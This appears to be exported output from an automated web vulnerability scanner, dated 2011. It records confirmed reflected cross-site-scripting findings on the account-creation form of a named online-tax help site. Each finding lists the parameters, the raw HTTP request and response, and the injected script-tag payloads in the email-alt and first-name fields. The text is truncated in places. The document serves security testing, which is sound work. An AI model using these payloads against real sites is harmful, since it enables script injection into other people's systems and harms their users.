X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Create a New Account</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script type="text/javascript"> // --------------------------------------------var _submit_accepted = false;var phone_numbers = new Array('', '', '', '', '');var p_postal_emask, p_postal_fstr, p_postal_dmask;var p_contact_phone_emask, p_contact_phone_fstr, p_contact_phone_dmask;var no_test = false, mask_str = null, cur_mask = null;var old_phone = 0;var postal_number = '';var submit_flag = true;// ----------------------------------------------------------------------------function _putCustomFieldMasks(formName){ for(i = 0; i < _fields.length; i++) if(_fields[i].name.match('_ccf_')) if(document[formName]['custom_text_' + _fields[i].name]) put_mask(_fields[i].name, document[formName]['custom_text_' + _fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + _fields[i].name]) { put_mask(_fields[i].name, document[formName]['custom_text_lh_' + _fields[i].name].value, document[formName], 0); document.getElementById(_fields[i].name + '_mask').innerHTML=''; }}// ----------------------------------------------------------------------------function init(){}// ----------------------------------------------------------------------------function _do_submit(form){ var chk_val, ph_mask, pt_mask; var msgs = new Array( "The username you have entered contains spaces. Please try again.", "Username must not contain quote characters. Please try again.", "The passwords you have entered do not match.\n\nPlease re-enter them.", "Passwords must be at least 5 characters long."); if ((form.p_email.value != "") && (form.p_email.value == form.p_email_alt1.value || form.p_email.value == form.p_email_alt2.value || ((form.p_email_alt1.value != "") && (form.p_email_alt1.value == form.p_email_alt2.value)))) { alert("An email address must be unique across the Email Address, Email Alt 1, and Email Alt 2 fields."); return(false); } if (_submit_accepted) // prevents NN4 resubmission return(false); if (!_validate_acctinfo(form.p_userid, form.p_passwd, form.p_passwd2, 5, msgs)) return(false); chk_val = _check_fields(form.name, fld_data, _fields); form.submit_btn.disabled = chk_val; _submit_accepted = chk_val; if (!chk_val) return (false); return(chk_val);}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function change_phone(num, sel_val){ phone_numbers[old_phone] = num.value; num.value = phone_numbers[sel_val]; old_phone = sel_val;}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function reset_phone(){ document._main.p_contact_phone.value = ''; phone_numbers = ['', '', '', '', ''];}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -var _fields = new Array (new field('p_userid', "Username", 5, 80, 33),new field('p_passwd', "Password", 5, 0, 0),new field('p_email', "Email Address", 5, 0, 37),new field('p_email_alt1', "Email Address", 5, 0, 36),new field('p_email_alt2', "Email Address", 5, 0, 36),new field('p_first_name', "First Name", 5, 0, 33),new field('p_last_name', "Last Name", 5, 0, 33),new field('', '', 0, 0, 0));var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:");// ------------------------------------------------------------------ </script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor" onLoad="_set_cursor(); init(); _putCustomFieldMasks('_main')"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" name="_main" method="post" action="acct_new_submit.php?p_sid=wWS3iKsk&amp;p_lva=3&amp;p_sp=&amp;p_li=3&amp;p_accessibility=&amp;p_redirect=" onSubmit="return(_do_submit(this))"><input type="hidden" name="p_next_page" value="myovr.php" /><input type="hidden" name="p_countryid" value="3" /><input type="hidden" name="p_provid" value="3" /><input type="hidden" name="p_ph_office" value="3" /><input type="hidden" name="p_ph_mobile" value="3" /><input type="hidden" name="p_ph_fax" value="3" /><input type="hidden" name="p_ph_asst" value="3" /><input type="hidden" name="p_ph_home" value="3" /><input type="hidden" name="p_postal_number" value="3" /><input type="hidden" name="p_token" value="" /><input type="hidden" name="p_subject" value="3" /><input type="hidden" name="p_question" value="3" /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=&p_sid=wWS3iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=&p_sid=wWS3iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=&p_sid=wWS3iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=&p_sid=wWS3iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><!-- Error message >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><br /><table cellpadding="2" cellspacing="0" border="0" width="100%"><tr><td colspan="2" class="subtitle">&nbsp;Account Creation Failed</td></tr><tr><td colspan="2" class="textcell"><table><tr><td class="textcell">Passwords must be at least 5 characters long.<br /></td></tr></table></td></tr><tr><td><font size="+1">&nbsp;</font></td></tr></table><table align="right"><tr><td><span class="smlabel"><font color="red">*</font> Denotes a required field.</span></td></tr></table><br /><table cellpadding="2" cellspacing="0" bo..
- /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php

/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=TyYLtJsk&p_lva=3&p_sp..

Parameters

Parameter Type Value
p_sid GET TyYLtJsk
p_lva GET 3
p_sp GET 3
p_li GET 3
p_accessibility GET 3
p_redirect GET 3
create_acct_btn POST Create a New Account
p_accessibility POST 0
p_countryid POST 3
p_email POST netsparker@example.com
p_email_alt1 POST netsparker@example.com
p_email_alt2 POST '"--></style></script><script>alert(0x001F75)</script>
p_first_name POST Smith
p_last_name POST Smith
p_li POST 3
p_lva POST 3
p_next_page POST myovr.php
p_passwd POST 3
p_passwd2 POST 3
p_ph_asst POST 3
p_ph_fax POST 3
p_ph_home POST 3
p_ph_mobile POST 3
p_ph_office POST 3
p_postal_number POST 3
p_provid POST 3
p_question POST 3
p_redirect POST 3
p_sid POST TyYLtJsk
p_sp POST 3
p_subject POST 3
p_token POST
p_userid POST 3
submit_btn POST Create Account

Request

POST /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=TyYLtJsk&p_lva=3&p_sp=3&p_li=3&p_accessibility=3&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Content-Length: 538
Accept-Encoding: gzip, deflate

create_acct_btn=Create+a+New+Account&p_accessibility=0&p_countryid=3&p_email=netsparker%40example.com&p_email_alt1=netsparker%40example.com&p_email_alt2=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001F75)%3C%2Fscript%3E&p_first_name=Smith&p_last_name=Smith&p_li=3&p_lva=3&p_next_page=myovr.php&p_passwd=3&p_passwd2=3&p_ph_asst=3&p_ph_fax=3&p_ph_home=3&p_ph_mobile=3&p_ph_office=3&p_postal_number=3&p_provid=3&p_question=3&p_redirect=3&p_sid=TyYLtJsk&p_sp=3&p_subject=3&p_token=&p_userid=3&submit_btn=Create+Account

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:00:16 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Sat, 30-Apr-2011 00:20:16 GMT
RNT-Time: D=236582 t=1304121616100096
RNT-Machine: 05
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Create a New Account</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script type="text/javascript"> // --------------------------------------------var _submit_accepted = false;var phone_numbers = new Array('', '', '', '', '');var p_postal_emask, p_postal_fstr, p_postal_dmask;var p_contact_phone_emask, p_contact_phone_fstr, p_contact_phone_dmask;var no_test = false, mask_str = null, cur_mask = null;var old_phone = 0;var postal_number = '';var submit_flag = true;// ----------------------------------------------------------------------------function _putCustomFieldMasks(formName){ for(i = 0; i < _fields.length; i++) if(_fields[i].name.match('_ccf_')) if(document[formName]['custom_text_' + _fields[i].name]) put_mask(_fields[i].name, document[formName]['custom_text_' + _fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + _fields[i].name]) { put_mask(_fields[i].name, document[formName]['custom_text_lh_' + _fields[i].name].value, document[formName], 0); document.getElementById(_fields[i].name + '_mask').innerHTML=''; }}// ----------------------------------------------------------------------------function init(){}// ----------------------------------------------------------------------------function _do_submit(form){ var chk_val, ph_mask, pt_mask; var msgs = new Array( "The username you have entered contains spaces. Please try again.", "Username must not contain quote characters. Please try again.", "The passwords you have entered do not match.\n\nPlease re-enter them.", "Passwords must be at least 5 characters long."); if ((form.p_email.value != "") && (form.p_email.value == form.p_email_alt1.value || form.p_email.value == form.p_email_alt2.value || ((form.p_email_alt1.value != "") && (form.p_email_alt1.value == form.p_email_alt2.value)))) { alert("An email address must be unique across the Email Address, Email Alt 1, and Email Alt 2 fields."); return(false); } if (_submit_accepted) // prevents NN4 resubmission return(false); if (!_validate_acctinfo(form.p_userid, form.p_passwd, form.p_passwd2, 5, msgs)) return(false); chk_val = _check_fields(form.name, fld_data, _fields); form.submit_btn.disabled = chk_val; _submit_accepted = chk_val; if (!chk_val) return (false); return(chk_val);}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function change_phone(num, sel_val){ phone_numbers[old_phone] = num.value; num.value = phone_numbers[sel_val]; old_phone = sel_val;}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function reset_phone(){ document._main.p_contact_phone.value = ''; phone_numbers = ['', '', '', '', ''];}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -var _fields = new Array (new field('p_userid', "Username", 5, 80, 33),new field('p_passwd', "Password", 5, 0, 0),new field('p_email', "Email Address", 5, 0, 37),new field('p_email_alt1', "Email Address", 5, 0, 36),new field('p_email_alt2', "Email Address", 5, 0, 36),new field('p_first_name', "First Name", 5, 0, 33),new field('p_last_name', "Last Name", 5, 0, 33),new field('', '', 0, 0, 0));var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:");// ------------------------------------------------------------------ </script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor" onLoad="_set_cursor(); init(); _putCustomFieldMasks('_main')"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" name="_main" method="post" action="acct_new_submit.php?p_sid=7*35iKsk&amp;p_lva=3&amp;p_sp=&amp;p_li=3&amp;p_accessibility=&amp;p_redirect=" onSubmit="return(_do_submit(this))"><input type="hidden" name="p_next_page" value="myovr.php" /><input type="hidden" name="p_countryid" value="3" /><input type="hidden" name="p_provid" value="3" /><input type="hidden" name="p_ph_office" value="3" /><input type="hidden" name="p_ph_mobile" value="3" /><input type="hidden" name="p_ph_fax" value="3" /><input type="hidden" name="p_ph_asst" value="3" /><input type="hidden" name="p_ph_home" value="3" /><input type="hidden" name="p_postal_number" value="3" /><input type="hidden" name="p_token" value="" /><input type="hidden" name="p_subject" value="3" /><input type="hidden" name="p_question" value="3" /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=&p_sid=7*35iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=&p_sid=7*35iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=&p_sid=7*35iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=&p_sid=7*35iKsk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_lva=3&amp;p_li=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><!-- Error message >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><br /><table cellpadding="2" cellspacing="0" border="0" width="100%"><tr><td colspan="2" class="subtitle">&nbsp;Account Creation Failed</td></tr><tr><td colspan="2" class="textcell"><table><tr><td class="textcell">Passwords must be at least 5 characters long.<br /></td></tr></table></td></tr><tr><td><font size="+1">&nbsp;</font></td></tr></table><table align="right"><tr><td><span class="smlabel"><font color="red">*</font> Denotes a required field.</span></td></tr></table><br /><table cellpadding="2" cellspacing="0" bo..
- /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php

/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=TyYLtJsk&p_lva=3&p_sp..

Parameters

Parameter Type Value
p_sid GET TyYLtJsk
p_lva GET 3
p_sp GET 3
p_li GET 3
p_accessibility GET 3
p_redirect GET 3
create_acct_btn POST Create a New Account
p_accessibility POST 0
p_countryid POST 3
p_email POST netsparker@example.com
p_email_alt1 POST netsparker@example.com
p_email_alt2 POST netsparker@example.com
p_first_name POST '"--></style></script><script>alert(0x001F85)</script>
p_last_name POST Smith
p_li POST 3
p_lva POST 3
p_next_page POST myovr.php
p_passwd POST 3
p_passwd2 POST 3
p_ph_asst POST 3
p_ph_fax POST 3
p_ph_home POST 3
p_ph_mobile POST 3
p_ph_office POST 3
p_postal_number POST 3
p_provid POST 3
p_question POST 3
p_redirect POST 3
p_sid POST TyYLtJsk
p_sp POST 3
p_subject POST 3
p_token POST
p_userid POST 3
submit_btn POST Create Account

Request

POST /cgi-bin/olt.cfg/php/enduser/acct_new_submit.php?p_sid=TyYLtJsk&p_lva=3&p_sp=3&p_li=3&p_accessibility=3&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_new.php
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Content-Length: 557
Accept-Encoding: gzip, deflate

create_acct_btn=Create+a+New+Account&p_accessibility=0&p_countryid=3&p_email=netsparker%40example.com&p_email_alt1=netsparker%40example.com&p_email_alt2=netsparker%40example.com&p_first_name=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x001F85)%3C%2Fscript%3E&p_last_name=Smith&p_li=3&p_lva=3&p_next_page=myovr.php&p_passwd=3&p_passwd2=3&p_ph_asst=3&p_ph_fax=3&p_ph_home=3&p_ph_mobile=3&p_ph_office=3&p_postal_number=3&p_provid=3&p_question=3&p_redirect=3&p_sid=TyYLtJsk&p_sp=3&p_subject=3&p_token=&p_userid=3&submit_btn=Create+Account

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:00:21 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Sat, 30-Apr-2011 00:20:21 GMT
RNT-Time: D=329561 t=1304121621464620
RNT-Machine: 05
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


